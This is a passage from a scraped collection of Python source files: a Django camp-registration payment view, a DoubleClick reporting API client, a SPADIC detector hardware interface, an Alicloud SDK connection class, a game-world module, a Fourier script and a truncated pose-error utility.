\r\n\r\n","sub_path":"Buchner2015-pricing-new.py","file_name":"Buchner2015-pricing-new.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602119847","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.core.urlresolvers import reverse\r\n\r\nfrom djforms.music.theatre.summer_camp import BCC, TO_LIST, REG_FEE\r\nfrom djforms.processors.models import Contact, Order\r\nfrom djforms.processors.forms import TrustCommerceForm\r\nfrom djforms.music.theatre.summer_camp.forms import RegistrationForm\r\n\r\nfrom djtools.utils.mail import send_mail\r\n\r\n\r\ndef registration(request):\r\n status = None\r\n msg = None\r\n if request.POST:\r\n form_reg = RegistrationForm(request.POST)\r\n if form_reg.is_valid():\r\n contact = form_reg.save()\r\n # credit card payment\r\n if contact.payment_method == 'Credit Card':\r\n order = Order(\r\n total=REG_FEE,auth='sale',status='In Process',\r\n operator='DJMusicTheatreCamp'\r\n )\r\n form_proc = TrustCommerceForm(order, contact, request.POST)\r\n if form_proc.is_valid():\r\n r = form_proc.processor_response\r\n order.status = r.msg['status']\r\n order.transid = r.msg['transid']\r\n order.cc_name = form_proc.name\r\n order.cc_4_digits = form_proc.card[-4:]\r\n order.save()\r\n contact.order.add(order)\r\n order.reg = contact\r\n sent = send_mail(\r\n request, TO_LIST,\r\n 'Music Theatre summer camp registration',\r\n contact.email,\r\n 'music/theatre/summer_camp/registration_email.html',\r\n order, BCC\r\n )\r\n order.send_mail = sent\r\n order.save()\r\n return HttpResponseRedirect(\r\n reverse('music_theatre_summer_camp_success')\r\n )\r\n else:\r\n r = form_proc.processor_response\r\n if r:\r\n order.status = r.status\r\n else:\r\n order.status = 'Form Invalid'\r\n order.cc_name = form_proc.name\r\n if form_proc.card:\r\n order.cc_4_digits = form_proc.card[-4:]\r\n order.save()\r\n contact.order.add(order)\r\n status = order.status\r\n order.reg = contact\r\n else:\r\n order = Order(\r\n total=REG_FEE,auth='COD',status='Pay later',\r\n operator='DJMusicTheatreCamp'\r\n )\r\n order.save()\r\n contact.order.add(order)\r\n order.reg = contact\r\n sent = send_mail(\r\n request, TO_LIST,\r\n 'Music Theatre summer camp registration',\r\n contact.email,\r\n 'music/theatre/summer_camp/registration_email.html',\r\n order, BCC\r\n )\r\n order.send_mail = sent\r\n order.save()\r\n return HttpResponseRedirect(\r\n reverse('music_theatre_summer_camp_success')\r\n )\r\n else:\r\n if request.POST.get('payment_method') == 'Credit Card':\r\n form_proc = TrustCommerceForm(None, request.POST)\r\n form_proc.is_valid()\r\n else:\r\n form_proc = TrustCommerceForm()\r\n else:\r\n form_reg = RegistrationForm()\r\n form_proc = TrustCommerceForm()\r\n\r\n return render(\r\n request,\r\n 'music/theatre/summer_camp/registration_form.html',\r\n {\r\n 'form_reg': form_reg,'form_proc':form_proc,\r\n 'status':status,'msg':msg,\r\n }\r\n )\r\n","sub_path":"djforms/music/theatre/summer_camp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21606804","text":"#!/usr/local/bin/python3\n\nimport os\nimport csv\nimport time\nimport pandas\nimport numpy\nimport logging\nfrom rpy2 import robjects as ro\nfrom datetime import datetime, timedelta\n\n# local imports\nfrom datagrabber import DCMGrabber\n\nclass APIDownloadError(Exception):\n\tpass\n\n\"\"\"HELPER METHODS\"\"\"\ndef parse_from_ms_timestamp(ms_timestamp):\n\treturn datetime.fromtimestamp(int(ms_timestamp)/1000.0)\n\n\"\"\"GENERAL DCM METHODS\"\"\"\n\ndef create_report(api, template):\n\tresponse = api.request(method=\"post\", url=api.urls.report, urlargs=(api.profile_id,), json=template, headers={'content-type': 'application/json'})\n\tif response.status_code == 200:\n\t\treturn response.json()[\"id\"]\n\telse:\n\t\traise Exception(response.text)\n\ndef delete_report(api, report_id):\n\tresponse = api.request(method=\"delete\", url=api.urls.report_get, urlargs=(api.profile_id,report_id))\n\treturn response\n\n\ndef run_report(api, report_id):\n\tlogging.info(\"Running DCM Report Profile #%s Report #%s\" % (api.profile_id, report_id))\n\tresponse = api.request(url=api.urls.report_run, method=\"post\", urlargs=(api.profile_id, report_id))\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\t\treturn data[\"id\"]\n\telse:\n\t\traise APIDownloadError(\"DCM API Report Did Not Run\")\n\ndef check_report(api, report_id, file_id):\n\tlogging.debug(\"Checking on DCM Report Profile #%s Report #%s File #%s\" % (api.profile_id, report_id, file_id))\n\tresponse = api.request(url=api.urls.report_check, urlargs=(api.profile_id, report_id, file_id))\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\t\tif data[\"status\"] == \"REPORT_AVAILABLE\":\n\t\t\treturn data[\"urls\"][\"apiUrl\"]\n\t\telif data[\"status\"] == \"PROCESSING\":\n\t\t\treturn None\n\t\telse:\n\t\t\traise APIDownloadError(\"DCM report #%s file #%s failed with condition %s\" % ( report_id, file_id, data[\"status\"] ) )\n\telif str(response.status_code)[0] in (\"3\",\"4\"):\n\t\traise APIDownloadError(\"DCM report #%s file #%s not found. Status: %s\" % (report_id, file_id, response.status_code))\n\telse:\n\t\treturn None\n\ndef pickup_report(api, resource_url, fname):\n\tlogging.info(\"Downloading DCM Report from URL %s\" % (resource_url))\n\treturn api.request_download(url=resource_url, fname=str(fname))\n\n\ndef recover_report(api, report_id, **dt_args):\n\n\tif len(dt_args) == 0:\n\t\t# defaults to 30 minute lookback window\n\t\tdt_args = {\"minutes\":30}\n\n\tresponse = api.request(method='get', url=api.urls.report_listfiles, urlargs=(api.profile_id, report_id), params={\"sortField\":\"LAST_MODIFIED_TIME\", \"sortOrder\":\"DESCENDING\"})\n\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\telse:\n\t\traise APIDownloadError(\"Report File List Not Found\")\n\n\tnow = datetime.now()\n\n\tfor item in data[\"items\"]:\n\t\ttimestamp = parse_from_ms_timestamp(item[\"lastModifiedTime\"])\n\t\tif item[\"status\"] == \"PROCESSING\" or ( item[\"status\"] == \"REPORT_AVAILABLE\" and now - timestamp < timedelta(**dt_args) ):\n\t\t\treturn item[\"id\"]\n\n\treturn None\n\t\t\n\ndef get_dcm_data(api, report_id, fname, wait=30, timeout=7200, force_new_report=False):\n\tlogging.info(\"Authenticating DCM API\")\n\tapi.authenticate()\n\tmax_attempts = timeout / wait\n\tattempts = 0\n\n\tif force_new_report:\n\t\tfile_id = run_report(api, report_id)\n\telse:\n\t\tfile_id = recover_report(api, report_id, hours=12)\n\t\tif file_id is None:\n\t\t\tfile_id = run_report(api, report_id)\n\n\twhile attempts <= max_attempts:\n\t\tattempts += 1\n\t\tresource = check_report(api, report_id, file_id)\n\t\tif resource is not None:\n\t\t\treturn pickup_report(api=api, resource_url=resource, fname=fname)\n\t\telse:\n\t\t\tlogging.debug(\"Waiting %s seconds\" % wait)\n\t\t\ttime.sleep(wait)\n\traise APIDownloadError(\"Maximum DCM Download Attempts Exceeded for report #%s file#%s\\nTimeout: %s, Attempts: %s\" % (report_id, file_id, timeout, attempts) )\n\n\n\"\"\"DIRTY DATA PULL METHODS\"\"\"\n\ndef generate_report_template(advertiser_id):\n\treturn {\n\t\t\"type\": \"STANDARD\",\n\t\t\"criteria\": {\n\t\t\t\"dateRange\": {\n\t\t\t \"relativeDateRange\": \"LAST_30_DAYS\"\n\t\t\t },\n\t\t\t\"dimensionFilters\": [\n\t\t\t\t{\n\t\t\t\t\t\"dimensionName\": \"dfa:advertiser\",\n\t\t\t\t\t\"matchType\": \"EXACT\",\n\t\t\t\t\t\"id\": str(advertiser_id)\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\"dimensions\": [\n\t\t\t\t{\"name\": \"dfa:date\"},\n\t\t\t\t{\"name\": \"dfa:country\"},\n\t\t\t\t{\"name\": \"dfa:state\"},\n\t\t\t\t{\"name\": \"dfa:dmaRegion\"},\n\t\t\t\t{\"name\": \"dfa:zipCode\"},\n\t\t\t\t{\"name\": \"dfa:advertiserId\"},\n\t\t\t\t{\"name\": \"dfa:campaignId\"},\n\t\t\t\t{\"name\": \"dfa:siteId\"},\n\t\t\t\t{\"name\": \"dfa:placementId\"},\n\t\t\t\t{\"name\": \"dfa:activityGroupId\"},\n\t\t\t\t{\"name\": \"dfa:activityId\"},\n\t\t\t\t{\"name\": \"dfa:creativeId\"},\n\t\t\t\t{\"name\": \"dfa:adId\"},\n\t\t\t\t{\"name\": \"dfa:adType\"},\n\t\t\t\t{\"name\": \"dfa:creativeType\"},\n\t\t\t\t{\"name\": \"dfa:placementCostStructure\"},\n\t\t\t\t{\"name\": \"dfa:platformType\"}\n\t\t\t ],\n\t\t\t\"metricNames\": [\n\t\t\t\t\"dfa:impressions\",\n\t\t\t\t\"dfa:clicks\",\n\t\t\t\t\"dfa:activeViewEligibleImpressions\",\n\t\t\t\t\"dfa:activeViewMeasurableImpressions\",\n\t\t\t\t\"dfa:activeViewViewableImpressions\",\n\t\t\t\t\"dfa:activityClickThroughConversions\",\n\t\t\t\t\"dfa:activityViewThroughConversions\",\n\t\t\t\t\"dfa:mediaCost\"\n\t\t\t ]\n\t\t\t},\n\t\t\t\"format\": \"CSV\",\n\t\t\t\"name\": \"_\".join([\"BulkCollection\", str(advertiser_id), datetime.now().strftime(\"%Y-%m-%d\")])\n\t\t\t}\n\ndef extract_metadata(metadata_file, r_script, output_dir=None, remove=False):\n\t\n\tif output_dir is None:\n\t\toutput_dir == \"NULL\"\n\n\texe = \"\"\"source( \"{r_script}\" )\n\textract_metadata( \"{metadata_file}\", \"{output_dir}\" )\n\t\"\"\".format(metadata_file=metadata_file, r_script=r_script, output_dir=output_dir)\n\tfpaths = tuple(ro.r(exe))\n\n\tif remove: os.unlink(metadata_file)\n\n\treturn fpaths\n\ndef clean_up_data(data_file, r_script, output_dir=None, remove=False):\n\n\tif output_dir is None:\n\t\toutput_dir == \"NULL\"\n\n\texe = \"\"\"source( \"{r_script}\" )\n\tclean_main_data( \"{data_file}\", \"{output_dir}\" )\n\t\"\"\".format(data_file=data_file, r_script=r_script, output_dir=output_dir)\n\tfpath = tuple(ro.r(exe))[0]\n\n\tif remove: os.unlink(data_file)\n\n\treturn fpath\n\ndef get_dcm_metadata(api, report_id, force_new_report=False):\n\n\tmetadata_file = get_dcm_data(api, report_id, 'metadata', wait=5, force_new_report=force_new_report)\n\n\treturn metadata_file\n\ndef get_dcm_advertiser_list(metadata_file, remove=False):\n\n\tadvertiser_ids = []\n\n\twith open(metadata_file) as f_in:\n\t\tskip = 8 # assumes header is 9 lines long\n\t\treader = csv.reader(f_in)\n\t\tfor i, row in enumerate(reader):\n\t\t\tif i <= skip:\n\t\t\t\tcontinue\n\t\t\tif row[0] != \"Grand Total:\":\n\t\t\t\tadvertiser_ids.append(row[0])\n\n\tif remove: os.unlink(metadata_file)\n\n\treturn tuple(set(advertiser_ids))\n\n\nif __name__==\"__main__\":\n\n\tfrom pprint import PrettyPrinter\n\tpp = PrettyPrinter(indent=1).pprint\n\n\tapi = DCMGrabber(\"google-dcm.dgconf\", 'google-dcm')\n\t# print(\"Authenticated\", api.authenticate())\n\n\t# test generate and delete report\n\t# temp = generate_report_template(3105496)\n\t# resp = delete_report(api, 35614433)\n\n\t# print(resp)\n\n\t# test generate, download, delete for each advertiser\n\t# ad_ids = get_dcm_advertiser_list(api, report_id=34834189, remove=False, force_new_report=False)\n\t# print(ad_ids[0])\n\n\t# temp = generate_report_template(3105496)\n\t# report_id = create_report(api, temp)\n\t# print(report_id)\n\t# resp = delete_report(api, 35614433)\n\n\t# strt = time.time()\n\t# for aid in ad_ids[:2]:\n\t# \tprint(\"Generating Template\", aid)\n\t# \ttemplate = generate_report_template(aid)\n\t# \tprint(\"Creating Report\", aid)\n\t# \treport_id = create_report(api, template)\n\t# \tprint(\"Running Report\", report_id)\n\t# \tdata_file = get_dcm_data(api, report_id, fname=aid, wait=15)\n\t# \tprint(\"Output File\", data_file)\n\t# \tdelete_report(api, report_id)\n\n\t# endrt = time.time()\n\n\t# print(\"total time:\",strt-endrt)\n\n\t# test recovering existing reports\n\t# recv = recover_report(api, 34834189, minutes=5)\n\t# print(recv)\n\n\t# test parse metadata\n\t# header_row = (\"advertiser_id\",\"advertiser\",\"campaign_id\",\"campaign\",\"site_id\",\"site\",\"placement_id\",\"placement\",\"activity_group_id\",\"activity_group\",\"activity_id\",\"activity\",\"ad_id\",\"ad\",\"creative_id\",\"creative\",\"impressions\")\n\t# print( extract_metadata(\"temp/google-dcm_advertiser-ids_20160108095328.csv\", \"data\") )\n\n\t# test placement parsing\n\t# print( parse_placement(\"data/placement_id.csv\") )\n\n\t# print( extract_metadata(\"temp/google-dcm_advertiser-ids_20160108095328.csv\", \"rscripts/transform.R\", \"doopboop\"))\n\n\t# print( clean_up_data(\"temp/google-dcm_4343044_20160108095402.csv\", \"rscripts/transform.R\", \"doopboop\") )\n","sub_path":"scripts/dcm_methods.py","file_name":"dcm_methods.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561863599","text":"import threading, Queue\nfrom util import IndexQueue\n\nimport ftdi_cbmnet\nfrom message import MessageSplitter, Message\nfrom registerfile import SpadicRegisterFile\nfrom shiftregister import SpadicShiftRegister\nfrom control import SpadicController\n\n\n# CBMnet control port <-> register file read/write commands\nRF_WRITE = 1\nRF_READ = 2\n\n\nclass Spadic(ftdi_cbmnet.FtdiCbmnetThreaded):\n \"\"\"\n Wrapper for CBMnet interface <-> SPADIC communication.\n \n Arguments:\n reset - flag for initial reset of the chip configuration\n load - name of .spc configuration file to be loaded\n\n Optional debugging keyword arguments:\n _debug_out - file-like object where debug output is sent to\n _debug_ftdi - flag for logging FTDI communication\n _debug_cbmif - flag for logging CBMnet interface communication\n \"\"\"\n def __init__(self, reset=False, load=None, **kwargs):\n try:\n ftdi_cbmnet.FtdiCbmnetThreaded.__init__(self)\n except IOError:\n raise # TODO enter offline mode\n\n # here we enforce arguments to be passed as keyword arguments\n debug_kwargs = ['_debug_out', '_debug_ftdi', '_debug_cbmif']\n for arg in debug_kwargs:\n if arg in kwargs:\n setattr(self, arg, kwargs[arg])\n\n self.readout_enable(0)\n\n # message splitters and output queues for groups A and B\n self._dataA_splitter = MessageSplitter()\n self._dataB_splitter = MessageSplitter()\n self._dataA_queue = Queue.Queue()\n self._dataB_queue = Queue.Queue()\n\n # register read result Queue (indexable)\n self._ctrl_queue = IndexQueue()\n\n # data reader thread\n self._recv_worker = threading.Thread(name=\"recv worker\")\n self._recv_worker.run = self._recv_job\n self._recv_worker.daemon = True\n self._recv_worker.start()\n\n # higher level register file access\n def rf_write_gen(name, addr):\n def write(value):\n self.write_register(addr, value)\n return write\n def rf_read_gen(name, addr):\n def read():\n return self.read_register(addr)\n return read\n self._registerfile = SpadicRegisterFile(rf_write_gen, rf_read_gen)\n\n # higher level shift register access\n self._shiftregister = SpadicShiftRegister(self.write_register,\n self.read_register)\n\n # highest level configuration controller\n self.control = SpadicController(self._registerfile,\n self._shiftregister, reset, load)\n\n self.readout_enable(1)\n\n\n def _recv_job(self):\n \"\"\"Process data received from the CBMnet interface.\"\"\"\n while not self._stop.is_set():\n try:\n (addr, words) = self._cbmif_read()\n except TypeError: # read result is None\n continue\n\n if addr == ftdi_cbmnet.ADDR_DATA_A:\n for m in self._dataA_splitter(words):\n self._dataA_queue.put(m)\n\n elif addr == ftdi_cbmnet.ADDR_DATA_B:\n for m in self._dataB_splitter(words):\n self._dataB_queue.put(m)\n\n elif addr == ftdi_cbmnet.ADDR_CTRL:\n [reg_addr, reg_val] = words\n self._ctrl_queue.put(reg_addr, reg_val)\n\n\n def __exit__(self, *args):\n \"\"\"Bring all threads to halt.\"\"\"\n if not hasattr(self, '_stop'):\n return\n if not self._stop.is_set():\n self._stop.set()\n ftdi_cbmnet.FtdiCbmnetThreaded.__exit__(self)\n self._recv_worker.join()\n # maybe do:\n #while self._recv_worker.is_alive():\n # self._recv_worker.join(timeout=1)\n if self._debug_cbmif:\n self._debug(\"[main]\", self._recv_worker.name, \"finished\")\n\n \n #----------------------------------------------------------------\n # access register file\n #----------------------------------------------------------------\n def write_register(self, address, value):\n \"\"\"Write a value into a register.\"\"\"\n addr = ftdi_cbmnet.ADDR_CTRL\n words = [RF_WRITE, address, value]\n self._cbmif_write(addr, words)\n\n def read_register(self, address, clear_skip=False,\n request_skip=False, request_only=False):\n \"\"\"Read the value from a register.\"\"\"\n if not request_skip:\n if not clear_skip:\n # Workaround for retransmit bug in SPADIC 1.0 CBMnet:\n # Sometimes old register reads are retransmitted -> Clear\n # software read buffer before sending the read request to be\n # sure to get the newest value.\n self._ctrl_queue.clear(address)\n # End workaround\n addr = ftdi_cbmnet.ADDR_CTRL\n words = [RF_READ, address, 0]\n self._cbmif_write(addr, words)\n if not request_only:\n try:\n return self._ctrl_queue.get(address, timeout=1)\n except IOError:\n raise\n \n\n #----------------------------------------------------------------\n # send DLMs\n #----------------------------------------------------------------\n def send_dlm(self, number):\n \"\"\"Send a DLM.\"\"\"\n addr = ftdi_cbmnet.ADDR_DLM\n words = [number]\n self._cbmif_write(addr, words)\n\n def readout_enable(self, enable):\n \"\"\"Start or stop data taking in the chip.\"\"\"\n dlm = 8 if enable else 9\n self.send_dlm(dlm)\n \n\n #----------------------------------------------------------------\n # read messages from groups A and B\n #----------------------------------------------------------------\n def read_groupA(self, timeout=1, raw=False):\n \"\"\"Get one message from group A, if available.\"\"\"\n try:\n data = self._dataA_queue.get(timeout=timeout)\n except Queue.Empty:\n return None\n return (data if raw else Message(data))\n\n def read_groupB(self, timeout=1, raw=False):\n \"\"\"Get one message from group B, if available.\"\"\"\n try:\n data = self._dataB_queue.get(timeout=timeout)\n except Queue.Empty:\n return None\n return (data if raw else Message(data))\n\n","sub_path":"spadic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389755768","text":"# coding:utf-8\nimport sys\nimport time\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\"\"\"\nHandles basic connections to ACS\n\"\"\"\n\nimport footmark\nimport importlib\nfrom footmark.exception import FootmarkServerError\nfrom footmark.provider import Provider\nimport json\nimport yaml\nfrom footmark.resultset import ResultSet\n\nfrom pprint import pprint\n\nfrom aliyunsdkcore import client\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\n\n\nclass ACSAuthConnection(object):\n def __init__(self, acs_access_key_id=None, acs_secret_access_key=None,\n region=None, provider='acs', security_token=None, user_agent=None):\n \"\"\"\n :keyword str acs_access_key_id: Your ACS Access Key ID (provided by\n Alicloud). If none is specified, the value in your\n ``ACS_ACCESS_KEY_ID`` environmental variable is used.\n :keyword str acs_secret_access_key: Your ACS Secret Access Key\n (provided by Alicloud). If none is specified, the value in your\n ``ACS_SECRET_ACCESS_KEY`` environmental variable is used.\n :keyword str security_token: The security token associated with\n temporary credentials issued by STS. Optional unless using\n temporary credentials. If none is specified, the environment\n variable ``ACS_SECURITY_TOKEN`` is used if defined.\n\n :keyword str region: The region ID.\n\n \"\"\"\n self.region = region\n self.user_agent = user_agent\n if isinstance(provider, Provider):\n # Allow overriding Provider\n self.provider = provider\n else:\n self._provider_type = provider\n self.provider = Provider(self._provider_type,\n acs_access_key_id,\n acs_secret_access_key,\n security_token)\n\n def acs_access_key_id(self):\n return self.provider.access_key\n\n acs_access_key_id = property(acs_access_key_id)\n access_key = acs_access_key_id\n\n def acs_secret_access_key(self):\n return self.provider.secret_key\n\n acs_secret_access_key = property(acs_secret_access_key)\n secret_key = acs_secret_access_key\n\n def region_id(self):\n return self.region\n\n\nclass ACSQueryConnection(ACSAuthConnection):\n ResponseError = FootmarkServerError\n\n def __init__(self, acs_access_key_id=None, acs_secret_access_key=None, region=None,\n product=None, security_token=None, provider='acs',\n user_agent='Alicloud-Footmark-v'+footmark.__version__):\n\n super(ACSQueryConnection, self).__init__(\n acs_access_key_id,\n acs_secret_access_key,\n region=region,\n security_token=security_token,\n provider=provider,\n user_agent=user_agent)\n\n self.product = product\n self.user_agent = user_agent\n\n def make_request(self, action, params=None):\n conn = client.AcsClient(self.acs_access_key_id, self.acs_secret_access_key, self.region, user_agent=self.user_agent)\n if not conn:\n footmark.log.error('%s %s' % ('Null AcsClient ', conn))\n raise self.FootmarkClientError('Null AcsClient ', conn)\n\n timeout = 200\n delay = 3\n while timeout > 0:\n try:\n target = importlib.import_module(self.product + '.' + action + 'Request')\n request = getattr(target, action + 'Request')()\n request.set_accept_format('json')\n if params and isinstance(params, dict):\n for k, v in params.items():\n if hasattr(request, k):\n getattr(request, k)(v)\n else:\n request.add_query_param(k[4:], v)\n return conn.do_action_with_exception(request)\n except Exception as e:\n if str(e.error_code) == \"SDK.ServerUnreachable\" \\\n or str(e.message).__contains__(\"SDK.ServerUnreachable\") \\\n or str(e.message).__contains__(\"Unable to connect server: timed out\"):\n time.sleep(delay)\n timeout -= delay\n continue\n raise e\n\n return None\n\n def build_list_params(self, params, items, label):\n if isinstance(items, str):\n items = str(items).strip()\n params['set_%s' % label] = items\n\n def parse_response(self, markers, body, connection):\n results = []\n body = yaml.safe_load(body)\n if not markers:\n markers = [\"\", ResultSet]\n\n result_set = ResultSet\n # For get_object\n if not markers[0] and markers[1] is not ResultSet:\n result_set = markers[1](connection)\n\n for key, value in body.items():\n self.parse_value(value)\n setattr(result_set, self.convert_name(key), value)\n\n if markers[0] and markers[0] in body:\n for value in getattr(result_set, self.convert_name(markers[0])).itervalues():\n if isinstance(value, list):\n for sub_value in value:\n element = markers[1](connection)\n for k, v in sub_value.items():\n setattr(element, k, v)\n results.append(element)\n elif isinstance(value, dict):\n element = markers[1](connection)\n for k, v in value.items():\n setattr(element, k, v)\n results.append(element)\n else:\n element = markers[1](connection)\n setattr(element, k, v)\n results.append(element)\n return results\n return result_set\n\n def parse_value(self, value):\n if isinstance(value, list):\n for item in value:\n self.parse_value(item)\n if isinstance(value, dict):\n for k, v in value.items():\n if isinstance(v, dict) or isinstance(v, list):\n self.parse_value(v)\n else:\n value.pop(k)\n value[self.convert_name(k)] = v\n for k, v in value.items():\n value.pop(k)\n value[self.convert_name(k)] = v\n # setattr(element, self.convert_name(key), value)\n return\n\n def convert_name(self, name):\n if name:\n new_name = ''\n tmp = ''\n for ch in name:\n if ch.isupper():\n tmp += ch\n continue\n if tmp:\n ch = '_' + tmp.lower() + ch\n tmp = ''\n new_name += ch\n if tmp:\n new_name += '_' + tmp.lower()\n if new_name.startswith('_'):\n new_name = new_name[1:]\n\n return new_name\n\n # generics\n def get_list(self, action, params, markers):\n try:\n body = self.make_request(action, params)\n footmark.log.debug('body= %s' % body)\n return self.parse_response(markers, body, self)\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise self.ResponseError(e)\n except Exception as e:\n footmark.log.error('%s' % e)\n raise e\n\n def get_status(self, action, params):\n try:\n body = self.make_request(action, params)\n footmark.log.debug('body= %s' % body)\n body = json.loads(body, encoding='UTF-8')\n if body:\n return True\n return False\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise e\n except Exception as e:\n footmark.log.error('%s' % e)\n raise e\n\n def get_object(self, action, params, obj):\n try:\n body = self.make_request(action, params)\n footmark.log.debug(body)\n markers = [\"\", obj]\n obj = self.parse_response(markers, body, self)\n if obj:\n return obj\n return None\n except ServerException as e:\n footmark.log.error('%s' % e)\n raise e\n except Exception as e:\n footmark.log.error('%s' % e)\n raise e\n","sub_path":"footmark/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628045165","text":"\nimport logging\nlog = logging.getLogger(__name__)\n\nimport os\nimport json\nimport time\n\nimport pygame\n\nimport euclid\nimport height_map\nimport entity\n\nimport components.ship\n\nclass World(object):\n\t\n\tdef __init__(self, directory):\n\t\t\n\t\tlog.info(\"Loading map from {0}\".format(directory))\n\t\tself.map_dir = directory\n\t\t\n\t\twith open(os.path.join(self.map_dir, \"map.json\"), \"r\") as fp:\n\t\t\tself.map_meta = json.load(fp)\n\t\t\t\t\n\t\tself.size = euclid.Vector3(*self.map_meta[\"size\"])\n\t\tself.sealevel = self.map_meta[\"sealevel\"]\n\t\tself.height_map = height_map.HeightMap(\n\t\t\t\t\t\t\t\tself.size,\n\t\t\t\t\t\t\t\tos.path.join(self.map_dir, self.map_meta[\"heightmap\"]),\n\t\t\t\t\t\t\t\t)\n\t\t\n\t\tself.entities = {}\n\t\t\n\t@property\n\tdef terrain_path(self):\n\t\treturn os.path.join(self.map_dir, \"terrain.png\")\n\t\n\tdef __repr__(self):\n\t\treturn \"{klass}(size=({size}), sealevel={sealevel}, {hmap}, nents={nents})\".format(\n\t\t\t\t\t\t\t\tklass=self.__class__.__name__,\n\t\t\t\t\t\t\t\tdir=self.map_dir,\n\t\t\t\t\t\t\t\tsize=\", \".join([str(i) for i in self.size]),\n\t\t\t\t\t\t\t\tsealevel=self.sealevel,\n\t\t\t\t\t\t\t\thmap=self.height_map,\n\t\t\t\t\t\t\t\tnents=len(self.entities)\n\t\t\t\t\t\t\t\t)\n\t\nclass ServerWorld(World):\n\t\n\tdef __init__(self, directory):\n\t\tWorld.__init__(self, directory)\n\t\t\n\t\tself.clock = pygame.time.Clock()\n\t\tself.t_accum = 0.0\n\t\tself.rate = 30.0\n\t\t\n\t\tself.entities = {}\n\t\tself._current_id = -1\n\t\t\n\t\tfor ship_def in self.map_meta.get(\"ships\", []):\n\t\t\tself.spawn_entity(**{\"components\": {components.ship.Ship: ship_def}})\n\t\t\t\n\t@property\n\tdef t_step(self):\n\t\treturn 1 / float(self.rate)\n\t\n\tdef next_id(self):\n\t\tself._current_id += 1\n\t\treturn self._current_id\n\t\n\tdef spawn_entity(self, **kwargs):\n\t\tent = entity.Entity(self, self.next_id(), **kwargs)\n\t\tself.entities[ent.id] = ent\n\t\tlog.debug(\"New entity {}; {}\".format(ent.id, \", \".join(c.__class__.__name__ for c in ent)))\n\t\treturn ent\n\t\n\tdef update(self):\n\t\t\n\t\tself.t_accum += self.clock.tick() / 1000.0\n\t\twhile self.t_accum >= self.t_step:\n\t\t\t\n\t\t\tfor ent in self.entities.itervalues():\n\t\t\t\tent.update(self.t_step)\n\t\t\t\t\n\t\t\tself.t_accum -= self.t_step\n\nclass ClientWorld(World):\n\t\n\tdef update(self, client):\n\n\t\tfor es in client.recv_entity_update(32):\n\t\t\tent = entity.Entity.from_state(self, es)\n\t\t\tself.entities[ent.id] = ent\n\n\n\t\t\t\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87568648","text":"#fourierAnalysis\n\nimport pandas as pd\nimport scipy as sp\nimport numpy as np\nimport math\n\n#find alpha(h), the Fourier alpha coefficient for the hth harmonic\ndef alphaH(y,t,N,h):\n sumContainer = []\n for point in range(0,N-1):\n sumContainter.append(y[point]*math.cos(2*math.pi*h*t[point]/float(N)))\n return 2/float(N)*sum(sumContainter)\n\n#find beta(h), the Fourier beta coefficient for the hth harmonic\ndef betaH(y,t,N,h):\n sumContainer = []\n for point in range(0,N-1):\n sumContainter.append(y[point]*math.sin(2*math.pi*h*t[point]/float(N)))\n return 2/float(N)*sum(sumContainter)\n\n\n#import the metadata\nmetadata = pd.read_csv(\"Data/aarhus/trafficMetaData.csv\")\n\nranges = [\"traffic_feb_june\",\"traffic_june_sep\",\"traffic_oct_nov\"]\n\n#load all of the data up.\ndata = []\nfor dateRange in range(0,2):\n data.append([])\n for id in range(0,(len(metadata.iloc[:,20]-1))):\n reportid = str(metadata.iloc[id,20])\n data[dateRange].append(pd.read_csv(\"Data/aarhus/\"+ranges[dateRange]+\"/trafficData\"+reportid+\".csv\"))\n","sub_path":"fourierAnalysis.py","file_name":"fourierAnalysis.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38607715","text":"import numpy as np\nimport transforms3d as tf3d\nimport copy\nimport math\n\n\nADD_CODE = 'ADD'\nADDS_CODE = 'ADDS'\nTRANSLATION_CODE = 'TR'\nROTATION_CODE = 'ROT'\nROTATION_X_CODE = 'ROT_X'\nROTATION_Y_CODE = 'ROT_Y'\nROTATION_Z_CODE = 'ROT_Z'\n\n\ndef to_rotation_matrix(vec6):\n z_axis = copy.deepcopy(vec6[0:3])\n z_axis /= np.linalg.norm(z_axis)\n y_axis = copy.deepcopy(vec6[3:6])\n y_axis = y_axis - np.dot(z_axis, y_axis) * z_axis\n y_axis /= np.linalg.norm(y_axis)\n x_axis = np.cross(y_axis, z_axis)\n rot = np.eye(3)\n rot[:, 0] = x_axis\n rot[:, 1] = y_axis\n rot[:, 2] = z_axis\n\n return rot\n\n\ndef to_transform(vec9, offset, dist):\n translation = copy.deepcopy(vec9[0:3])\n translation *= dist\n translation += offset.flatten()\n rot = to_rotation_matrix(vec9[3:9])\n\n transform = np.eye(4)\n transform[:3, :3] = rot\n transform[:3, 3] = translation\n\n return transform\n\n\ndef to_transform_batch(vecvec9, offsets, dists):\n transforms = []\n for i in range(len(vecvec9)):\n transforms.append(to_transform(vecvec9[i], offsets[i], dists[i]))\n return transforms\n\n\ndef translation_error(gt_pose, est_pose):\n return np.linalg.norm(gt_pose[:3, 3] - est_pose[:3, 3])\n\n\ndef rotation_error(gt_pose, est_pose):\n est_pose_new = 